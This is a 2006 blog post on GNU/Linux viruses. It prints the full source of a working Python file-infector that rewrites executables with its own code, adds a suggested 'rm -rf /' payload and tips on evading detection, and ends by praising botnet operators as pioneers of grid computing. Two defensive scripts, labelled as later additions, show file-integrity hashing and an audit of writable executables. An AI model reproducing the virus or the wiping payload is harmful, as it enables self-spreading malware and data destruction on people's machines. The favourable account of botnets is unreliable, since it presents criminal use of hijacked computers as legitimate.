Viruses

2006-02-25

You sometimes hear nonsense like "there are no viruses for GNU/Linux". Anyone with half a brain knows otherwise, but why is this idea still alive? What is a virus anyway? A computer virus is a program that copies itself into other programs. To avoid being noticed, the virus keeps the infected program working. So here is the plan:

  • plant an infected program where someone dumb will run it
  • when the infected program starts, the virus kicks in first
  • the virus looks for another program to infect
  • the virus launches the infected program

Simple, isn't it? Yes, it's dead simple. Here is a working example:

#!/usr/bin/python

# This is a proof of concept virus for GNU/Linux.  As you can see by
# running it it is possible to have viruses for GNU/Linux.
# Fortunately a sane privilege model will limit the amount of damage
# such a virus will do.

# I, Yannick Gingras <ygingras@ygingras>, wrote this virus for
# educational purpose.  I crippled it so it won't spread.  Use it at
# your own risks.

import sys
import os
import stat
import random
from tempfile import NamedTemporaryFile

TARGETS_DIR = "/tmp/infectable"
PRG = "echo hello" # will be replaced by the targets body
VIRUS = open(os.popen("which "+sys.argv[0]).read().strip()).readlines()
MODE = stat.S_IRWXU + stat.S_IROTH + stat.S_IXOTH

def infected(path):
    # not really good, we won't infect many files...
    return open(path).readline() == VIRUS[0]

def infect():
    if not os.path.isdir(TARGETS_DIR):
        return
    target = os.path.join(TARGETS_DIR,
                          random.choice(os.listdir(TARGETS_DIR)))
    if infected(target):
        return
    data = open(target).read()
    lines = map(lambda l: (len(l) > 5 and l[:5] == "PRG =")
                and ("PRG = " + repr(data) + "\n") or l,
                VIRUS)
    open(target, "w").write("".join(lines))
    os.chmod(target, MODE)

def run():
    print "pwn3d!"
    tmp = NamedTemporaryFile("w")
    tmp.write(PRG)
    tmp.file.close()
    os.chmod(tmp.name, MODE)
    os.system(tmp.name+" "+" ".join(map(lambda a:"'%s'" % a,
                                        sys.argv[1:])))

if __name__ == "__main__":
    random.seed()
    infect()
    run()
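
The virus above has to rewrite its target on disk, so the target's bytes change. The defender's counterpart, added here as an example and not part of the original post, is a file-integrity baseline: hash every regular file in a directory once, keep the manifest somewhere the monitored directory cannot reach, and re-check later to report anything that was modified, added or removed. The sample files in demo() are constructed for the example; nothing here is taken from the post's code.

```python
#!/usr/bin/env python3
"""File-integrity baseline: notice when a program's bytes change on disk.

Added example, not from the original post.  A file infector has to rewrite
its target, so the target's content hash changes.  Recording the hashes once
and re-checking later is the classic way to catch that (tools such as AIDE
and Tripwire do this at scale).  The files in demo() are constructed.
"""
import hashlib
import json
import os
import tempfile
from typing import Dict, List


def sha256_of(path: str) -> str:
    """Hex SHA-256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(directory: str) -> Dict[str, str]:
    """Hash every regular file directly under `directory`, keyed by name.

    Symlinks are skipped: an infector rewrites the file it can open, and a
    link would only make us hash the same bytes twice.
    """
    manifest = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path) and not os.path.islink(path):
            manifest[name] = sha256_of(path)
    return manifest


def diff_manifests(old: Dict[str, str], new: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify differences between two manifests.

    An infected program shows up under "modified"; a dropped helper file
    shows up under "added".
    """
    return {
        "modified": sorted(n for n in old if n in new and new[n] != old[n]),
        "added": sorted(n for n in new if n not in old),
        "removed": sorted(n for n in old if n not in new),
    }


def save_manifest(manifest: Dict[str, str], path: str) -> None:
    """Write the manifest as sorted JSON so two runs can be diffed by eye."""
    with open(path, "w") as f:
        json.dump(manifest, f, indent=2, sort_keys=True)


def load_manifest(path: str) -> Dict[str, str]:
    with open(path) as f:
        return json.load(f)


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a directory, tamper with it, re-check."""
    with tempfile.TemporaryDirectory() as bin_dir, \
            tempfile.TemporaryDirectory() as store:
        for name, body in (("hello", "#!/bin/sh\necho hello\n"),
                           ("bye", "#!/bin/sh\necho bye\n")):
            with open(os.path.join(bin_dir, name), "w") as f:
                f.write(body)

        # Take the baseline and keep it outside the monitored directory
        # (a read-only medium or another host in practice).
        manifest_path = os.path.join(store, "manifest.json")
        save_manifest(baseline(bin_dir), manifest_path)

        # Simulate tampering: "hello" is rewritten and a new file appears.
        with open(os.path.join(bin_dir, "hello"), "w") as f:
            f.write("#!/bin/sh\n# something else now runs first\necho hello\n")
        with open(os.path.join(bin_dir, "dropper"), "w") as f:
            f.write("#!/bin/sh\n")

        return diff_manifests(load_manifest(manifest_path), baseline(bin_dir))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In practice you would run baseline() against the directories on your PATH right after installation, store the manifest off-box, and schedule the re-check; the point of keeping the manifest out of reach is that a program which can rewrite your binaries could otherwise rewrite the manifest too.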

This nice and portable virus will even run on any system where Python is ported, not just on GNU/Linux. Why are most GNU/Linux systems free of viruses then? You might have noticed that this virus needs to open its target in write mode. That's the catch. On GNU/Linux, ordinary users can't open the installed programs in write mode. But someone dumb enough to run this file as root would be in big trouble.
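The catch above is a permission check, so it is worth being able to ask the question directly: which executables in a given set of directories could my account actually rewrite? The audit below is an added example, not code from the original post. It reads ownership and the stat mode bits instead of calling os.access(), because os.access() answers "yes" to everything when run as root and hides exactly the point the paragraph makes. The directory and file names in demo() are constructed.

```python
#!/usr/bin/env python3
"""Audit directories for executables the current account could rewrite.

Added example, not from the original post.  A file infector needs write
access to its target; this lists the executables for which a given uid has
it, and why.  Ownership and mode bits are used rather than os.access(), so
the answer does not silently become "everything" when run as root (root
bypasses these checks entirely, which is the post's warning).
"""
import os
import stat
import tempfile
from typing import Dict, Iterable, List, Optional


def writable_reasons(path: str, uid: int, gids: Iterable[int]) -> List[str]:
    """Return the reasons `uid` can write the executable at `path` (empty if none)."""
    st = os.lstat(path)
    mode = st.st_mode
    if not stat.S_ISREG(mode):
        return []                      # skip directories, symlinks, devices
    if not mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        return []                      # only programs are of interest here
    reasons = []
    if st.st_uid == uid and mode & stat.S_IWUSR:
        reasons.append("owner-writable (owned by this uid)")
    if st.st_gid in set(gids) and mode & stat.S_IWGRP:
        reasons.append("group-writable (this uid is in the group)")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit(directories: Iterable[str],
          uid: Optional[int] = None,
          gids: Optional[Iterable[int]] = None) -> Dict[str, List[str]]:
    """Map each writable executable under `directories` to its reasons.

    Defaults to the calling account; pass uid/gids to answer the question
    for another account (e.g. a service user) without switching to it.
    """
    uid = os.getuid() if uid is None else uid
    gids = list(os.getgroups()) + [os.getgid()] if gids is None else list(gids)
    findings: Dict[str, List[str]] = {}
    for d in directories:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            reasons = writable_reasons(path, uid, gids)
            if reasons:
                findings[path] = reasons
    return findings


def demo() -> Dict[str, List[str]]:
    """Constructed directory with three executables of different modes."""
    with tempfile.TemporaryDirectory() as d:
        for name, mode in (("mine", 0o755), ("locked", 0o555), ("open", 0o777)):
            p = os.path.join(d, name)
            with open(p, "w") as f:
                f.write("#!/bin/sh\necho %s\n" % name)
            os.chmod(p, mode)
        return {os.path.basename(k): v for k, v in audit([d]).items()}


if __name__ == "__main__":
    # Real use: every directory on PATH, for the account you are running as.
    for path, why in audit(os.environ.get("PATH", "").split(os.pathsep)).items():
        print(path, "->", "; ".join(why))
```

On a stock system the PATH audit should come back nearly empty for an unprivileged account; anything it does list (a private ~/bin, a world-writable directory someone added to PATH) is precisely the set of programs the post's virus could infect when run as that user.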

There is something else. Looking at how simple a virus is, I hope people will stop thinking that virus writers are programming gods. Writing a virus is so easy that most people who can program never even try to do it. There is no challenge at all. Since I learned how to open a pipe, a long time ago, it was clear in my head how a virus was made. I decided to write this one down because I noticed that this idea is not clear to some people who are otherwise really brilliant.

Ok, yes, there is a bit more to it. This sample virus has no payload. To make it replicate and once in a while bust the whole system, you would need to change the payload to something like this:

       random.randrange(666) or os.system("rm -rf / &")

Still not such a challenge. To avoid detection you need to replicate, but not verbatim. This is a bit hard with Python, but you could use Perl and be very creative in formatting the code in the target.

Where virus writers do display ingenuity is with botnets. Many "enterprise" vendors claim that they have a powerful "grid" solution. You see and hear "grid" everywhere, but what does it really mean? Grid usually refers to a heterogeneous cluster, where a cluster is usually a bunch of smaller computers duct-taped together to form a bigger computer, sort of. Some massively distributed solutions are available out there, like foo@home, distributed.net and BOINC, but they all seem to miss the big picture. What do I get from running their computation client? And why can't I send my own task to the grid?

Bot masters write viruses that install computation clients on infected computers. When someone wants a computation, he asks a bot master to run it on his infected computers. Bot masters are the first step in the democratization of distributed computing power. When someone manages to find a convincing argument for people to install a distributed computation client, we'll have larger grid networks. And then the leading grid networks will be the ones where everyone can bid and submit his jobs, with no overhead: just download the devel-kit, derive the Cruncher class and upload it to the grid controller with your bid. Jobs could be sent to a priority queue ordered by bid. And we know there is a buck to be made in the democratization of the grid, because bot masters are already getting rich.
